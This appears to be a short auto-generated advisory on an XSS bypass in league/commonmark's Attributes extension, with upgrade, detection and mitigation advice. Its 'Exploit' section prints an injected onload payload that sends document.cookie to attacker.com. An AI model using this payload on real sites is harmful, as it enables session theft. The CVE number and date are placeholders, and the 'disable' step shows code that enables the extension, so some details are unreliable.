league/commonmark, Cross-Site Scripting (XSS), CVE-2023-XXXX (Critical)

The CVE-2023-XXXX vulnerability in the league/commonmark library’s Attributes extension allows attackers to bypass XSS protections by injecting malicious HTML attributes via Markdown syntax. Despite secure configurations like `html_input: ‘strip’` and allow_unsafe_links: false, enabling the Attributes Extension permits attribute injection using curly braces.

An attacker can craft a payload like:

<img src="x" alt="alt" />{onerror="alert(1)"}

This renders as:

<img src="x" alt="alt" onerror="alert(1)" />

When parsed, the `onerror` JavaScript executes upon page load, leading to arbitrary code execution. The vulnerability stems from insufficient sanitization of user-supplied attributes, even when unsafe HTML is stripped.

DailyCVE Form:

Platform: league/commonmark
Version: 1.5.0 – 2.6.x
Vulnerability: XSS bypass
Severity: Critical
Date: 2023-XX-XX

What Undercode Say:

Exploit:

1. Craft malicious Markdown with event handlers:

<img src="x" alt="XSS" />{onload="fetch('https://attacker.com/?cookie='+document.cookie)"}

2. Use in user-generated content (comments, posts).

Protection:

1. Upgrade to league/commonmark >= 2.7.0.

2. Disable AttributesExtension for untrusted input:

$environment->addExtension(new AttributesExtension()); // Only for trusted users.

3. Sanitize output with libraries like `HTML Purifier`.

Detection Commands:

Composer check:

composer show league/commonmark | grep "version"

Grep for vulnerable configs:

grep -r "AttributesExtension()" /path/to/code

Patch Analysis:

Blocks `on` attributes by default.
Enforces `allow_unsafe_links` for href/src.

Mitigation Code:

// Safe config (if upgrade impossible):
$config = [
'html_input' => 'escape',
'allow_unsafe_links' => false,
'attributes' => ['disallowed' => ['on']]
];